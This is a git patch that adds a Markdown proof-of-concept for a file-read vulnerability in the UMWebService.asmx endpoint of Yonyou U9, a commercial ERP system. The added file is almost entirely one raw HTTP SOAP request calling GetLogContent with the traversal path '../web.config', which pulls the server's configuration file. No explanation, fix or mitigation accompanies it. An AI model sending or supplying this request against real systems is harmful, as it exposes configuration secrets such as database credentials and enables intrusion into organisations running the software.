From 9bd02215f33a4604e1e1bb566847e0787a38c2de Mon Sep 17 00:00:00 2001 From: wy876 <139549762+wy876@users.noreply.github.com> Date: Fri, 1 Mar 2024 15:18:00 +0800 Subject: [PATCH] =?UTF-8?q?Create=20=E7=94=A8=E5=8F=8BU9-UMWebService.asmx?= =?UTF-8?q?=E5=AD=98=E5=9C=A8=E6=96=87=E4=BB=B6=E8=AF=BB=E5=8F=96=E6=BC=8F?= =?UTF-8?q?=E6=B4=9E.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- 用友U9-UMWebService.asmx存在文件读取漏洞.md | 22 +++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 用友U9-UMWebService.asmx存在文件读取漏洞.md diff --git a/用友U9-UMWebService.asmx存在文件读取漏洞.md b/用友U9-UMWebService.asmx存在文件读取漏洞.md new file mode 100644 index 0000000..0c7e000 --- /dev/null +++ b/用友U9-UMWebService.asmx存在文件读取漏洞.md @@ -0,0 +1,22 @@ +## 用友U9-UMWebService.asmx存在文件读取漏洞 + +## poc +``` +POST /u9/OnLine/UMWebService.asmx HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Safari/537.36 +Connection: close +Content-Length: 381 +Content-Type: text/xml; charset=utf-8 +SOAPAction: "http://tempuri.org/GetLogContent" +Accept-Encoding: gzip + + + + + + ../web.config + + + +```